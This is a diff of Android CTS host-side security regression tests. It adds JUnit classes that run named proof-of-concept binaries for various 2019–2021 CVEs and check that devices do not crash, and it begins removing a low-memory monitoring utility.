index 00000000000..0ac90e48244 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2035 extends SecurityTestCase { + + /** + * b/122320256 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-04") + @Test + public void testPocCVE_2019_2035() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java new file mode 100644 index 00000000000..2619ed97cdf --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2040 extends SecurityTestCase { + + /** + * b/122316913 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-04") + @Test + public void testPocCVE_2019_2040() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java new file mode 100644 index 00000000000..6072d129a74 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2044 extends SecurityTestCase { + + /** + * b/123701862 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-05") + @Test + public void testPocCVE_2019_2044() throws Exception { + pocPusher.only32(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java new file mode 100644 index 00000000000..e20bb5cc815 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2099 extends SecurityTestCase { + + /** + * b/123583388 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + **/ + @SecurityTest(minPatchLevel = "2019-06") + @Test + public void testPocCVE_2019_2099() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java index db98e2858b0..68332436dbb 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java @@ -33,6 +33,7 @@ public class CVE_2019_2135 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2135() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java new file mode 100644 index 00000000000..20396acedff --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2206 extends SecurityTestCase { + + /** + * b/139188579 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-11") + @Test + public void testPocCVE_2019_2206() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java new file mode 100644 index 00000000000..6f4340c159a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2207 extends SecurityTestCase { + + /** + * b/124524315 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-11") + @Test + public void testPocCVE_2019_2207() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java new file mode 100644 index 00000000000..efd1e548e27 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0006 extends SecurityTestCase { + + /** + * b/139738828 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-01") + @Test + public void testPocCVE_2020_0006() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java index 4e0a4a6e754..e6241349987 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java @@ -32,6 +32,7 @@ public class CVE_2020_0037 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0037() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java index 6759c30caf3..5731c12a91a 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java @@ -32,6 +32,7 @@ public class CVE_2020_0038 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0038() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java index f0f3323f20c..7d5ae378f34 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java @@ -32,6 +32,7 @@ public class CVE_2020_0039 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0039() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java new file mode 100644 index 00000000000..79826e7b940 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java @@ -0,0 +1,46 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.compatibility.common.util.CrashUtils; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0073 extends SecurityTestCase { + + /** + * b/147309942 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2020-04") + @Test + public void testPocCVE_2020_0073() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + String binaryName = "CVE-2020-0073"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java new file mode 100644 index 00000000000..b02eeea126a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java @@ -0,0 +1,48 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import java.util.Arrays; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0224 extends SecurityTestCase { + + /** + * b/147664838 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-07") + @Test + public void testPocCVE_2020_0224() throws Exception { + String inputFiles[] = {"cve_2020_0224.pac"}; + String binaryName = "CVE-2020-0224"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + testConfig.config.checkMinAddress(false); + testConfig.arguments = AdbUtils.TMP_PATH + inputFiles[0]; + testConfig.inputFiles = Arrays.asList(inputFiles); + testConfig.inputFilesDestination = AdbUtils.TMP_PATH; + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java new file mode 100644 index 00000000000..4c2b91d63a6 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0243 extends SecurityTestCase { + + /** + * b/151644303 + * Vulnerability Behaviour: SIGSEGV in mediaserver + */ + @SecurityTest(minPatchLevel = "2020-08") + @Test + public void testPocCVE_2020_0243() throws Exception { + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver"); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java new file mode 100644 index 00000000000..2e1ca03f0a4 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java @@ -0,0 +1,42 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import static org.junit.Assume.assumeFalse; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0383 extends SecurityTestCase { + + /** + * b/150160279 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0383() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"}; + String binaryName = "CVE-2020-0383"; + AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName, + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java new file mode 100644 index 00000000000..dd2aff8ff0a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java @@ -0,0 +1,63 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AppModeInstant; +import android.platform.test.annotations.AppModeFull; +import android.util.Log; +import android.platform.test.annotations.SecurityTest; + +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test; + +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; + +/** + * Test that collects test results from test package android.security.cts.CVE_2021_0305. + * + * When this test builds, it also builds a support APK containing + * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are + * collected from the hostside and reported accordingly. + */ +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0305 extends BaseHostJUnit4Test { + private static final String TEST_PKG = "android.security.cts.CVE_2021_0305"; + private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest"; + private static final String TEST_APP = "CVE-2021-0305.apk"; + + @Before + public void setUp() throws Exception { + uninstallPackage(getDevice(), TEST_PKG); + } + + @Test + @SecurityTest(minPatchLevel = "2020-09") + @AppModeFull + public void testRunDeviceTestsPassesFull() throws Exception { + installPackage(); + Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick")); + } + + private void installPackage() throws Exception { + installPackage(TEST_APP, new String[0]); + } +} + diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java new file mode 100644 index 00000000000..2160aca84bd --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0393 extends SecurityTestCase { + + /** + * b/168041375 + * Vulnerability Behavior: SIGSEGV in pacrunner + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0393() throws Exception { + pocPusher.only64(); + AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java new file mode 100644 index 00000000000..3df46a76740 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertTrue; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0396 extends SecurityTestCase { + + /** + * b/160610106 + * Vulnerability Behaviour: SIGSEGV in pacrunner + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0396() throws Exception { + AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java new file mode 100644 index 00000000000..935b6010aaa --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java @@ -0,0 +1,37 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0430 extends SecurityTestCase { + + /** + * b/178725766 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2021-04") + @Test + public void testPocCVE_2021_0430() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java new file mode 100644 index 00000000000..25802a00eb2 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0439 extends SecurityTestCase { + + /** + * b/174243830 + * Vulnerability Behaviour: SIGSEGV in system_server + */ + @SecurityTest(minPatchLevel = "2021-04") + @Test + public void testPocCVE_2021_0439() throws Exception { + String processPatternStrings[] = {"system_server"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(), + processPatternStrings); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java deleted file mode 100644 index d97c4dbfc0f..00000000000 --- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java +++ /dev/null @@ -1,228 +0,0 @@ -/* - * Copyright (C) 2018 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package android.security.cts; - -import com.android.tradefed.device.CollectingOutputReceiver; -import com.android.tradefed.device.DeviceNotAvailableException; -import com.android.tradefed.device.ITestDevice; -import com.android.tradefed.testtype.DeviceTestCase; -import com.android.tradefed.device.BackgroundDeviceAction; - -import android.platform.test.annotations.RootPermissionTest; - -import java.io.BufferedOutputStream; -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.OutputStream; -import java.util.Scanner; -import java.util.regex.Pattern; -import java.util.regex.Matcher; -import java.util.Map; -import java.util.HashMap; -import java.util.concurrent.ConcurrentHashMap; -import com.android.ddmlib.MultiLineReceiver; -import com.android.ddmlib.Log; -import com.android.ddmlib.TimeoutException; -import java.lang.ref.WeakReference; - -/** - * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that - * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an - * instance per instance of SecurityTestCase and call start() and stop() matching to - * SecurityTestCase setup() and teardown(). - */ -public class HostsideOomCatcher { - - private static final String LOG_TAG = "HostsideOomCatcher"; - - private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB - private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers = - new ConcurrentHashMap<>(); - private static Map<String, Long> totalMemories = new ConcurrentHashMap<>(); - - private boolean isLowMemoryDevice = false; - - private SecurityTestCase context; - - /** - * test behavior when oom is detected. - */ - public enum OomBehavior { - FAIL_AND_LOG, // normal behavior - PASS_AND_LOG, // skip tests that oom low memory devices - FAIL_NO_LOG, // tests that check for oom - } - private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads - private boolean oomDetected = false; // accessed across threads - - public HostsideOomCatcher(SecurityTestCase context) { - this.context = context; - } - - /** - * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal - */ - private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException { - // cache device TotalMem to avoid an adb shell for every test. - String serial = device.getSerialNumber(); - Long totalMemory = totalMemories.get(serial); - if (totalMemory == null) { - String memInfo = device.executeShellCommand("cat /proc/meminfo"); - Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]"); - Matcher matcher = pattern.matcher(memInfo); - if (matcher.find()) { - totalMemory = Long.parseLong(matcher.group(1)); - } else { - throw new RuntimeException("Could not get device memory total."); - } - 